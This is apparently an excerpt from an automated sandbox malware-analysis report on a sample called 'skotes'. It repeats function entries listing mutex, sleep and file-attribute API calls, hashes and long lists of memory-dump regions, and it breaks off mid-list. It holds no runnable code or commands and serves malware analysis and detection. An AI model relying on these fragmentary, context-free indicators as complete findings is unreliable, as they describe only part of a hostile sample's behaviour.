                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 396266464-2857566196
                                                                                                                                                                    • Opcode ID: 7bcdf8dce7e3e60861a3f45f061182961d17fb465d275bb23d148538aa8d7187
                                                                                                                                                                    • Instruction ID: 21c28341fcc80dd2824ea0c76f18fb2eb87a5d648fd983e528e9aa13cbd7ba02
                                                                                                                                                                    • Opcode Fuzzy Hash: 7bcdf8dce7e3e60861a3f45f061182961d17fb465d275bb23d148538aa8d7187
                                                                                                                                                                    • Instruction Fuzzy Hash: 27314A31B111049BEB08DBB8DD89BEDB773DF85314F288658E068973D5C73699C08756
                                                                                                                                                                    Function 0061A1AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 0061A1B1
                                                                                                                                                                    • Sleep.KERNEL32(00000064,?), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 396266464-2857566196
                                                                                                                                                                    • Opcode ID: 0520d48ca0a6add3012c27ef97fb0ef691316fdc9ed8dff5ba43621736ff16f4
                                                                                                                                                                    • Instruction ID: dd0666cd92100e0c969fba3fb049b926801c9169463bfb723ce94f6eb55136fa
                                                                                                                                                                    • Opcode Fuzzy Hash: 0520d48ca0a6add3012c27ef97fb0ef691316fdc9ed8dff5ba43621736ff16f4
                                                                                                                                                                    • Instruction Fuzzy Hash: 7C314A31A111009BEB08DBF8DC89BEDB773EF86310F288658E064A73D5D7369AC08752
                                                                                                                                                                    Function 0061A2E3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 134sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 0061A2E6
                                                                                                                                                                    • Sleep.KERNEL32(00000064,?), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 396266464-2857566196
                                                                                                                                                                    • Opcode ID: 9f070c900c0c0ad10e8447fd6e78818683694636698fe7e178b04b50de9dd382
                                                                                                                                                                    • Instruction ID: 2689ed3a140b332c7e78a755f9dc6526c5f1017cd2ed84eec0ba86ca9288a9c6
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f070c900c0c0ad10e8447fd6e78818683694636698fe7e178b04b50de9dd382
                                                                                                                                                                    • Instruction Fuzzy Hash: B7312A31A112049BEB08DBB8DC857ECB773AF81314F288658E065E77D5C73699C08752
                                                                                                                                                                    Function 0061A418 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 0061A41B
                                                                                                                                                                    • Sleep.KERNEL32(00000064,?), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesCreateFileMutexSleep
                                                                                                                                                                    • String ID: T2g
                                                                                                                                                                    • API String ID: 396266464-2857566196
                                                                                                                                                                    • Opcode ID: 1082183fa064e173c214b6ec29a755d9deab75e65a2ce42c4118cabe3559a8aa
                                                                                                                                                                    • Instruction ID: f2759d80204dad6a3c92e981e8b927c2e21b64a978eb6eac360990b328a5cb97
                                                                                                                                                                    • Opcode Fuzzy Hash: 1082183fa064e173c214b6ec29a755d9deab75e65a2ce42c4118cabe3559a8aa
                                                                                                                                                                    • Instruction Fuzzy Hash: CA310931A111049BEB08DBF8D8C9BEDB7A3DF81314F288658E0649B3D5D77599C08756
                                                                                                                                                                    Function 0061A54D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 132sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 0061A550
                                                                                                                                                                    • Sleep.KERNEL32(00000064,?), ref: 0061A963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,00673254), ref: 0061A981
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
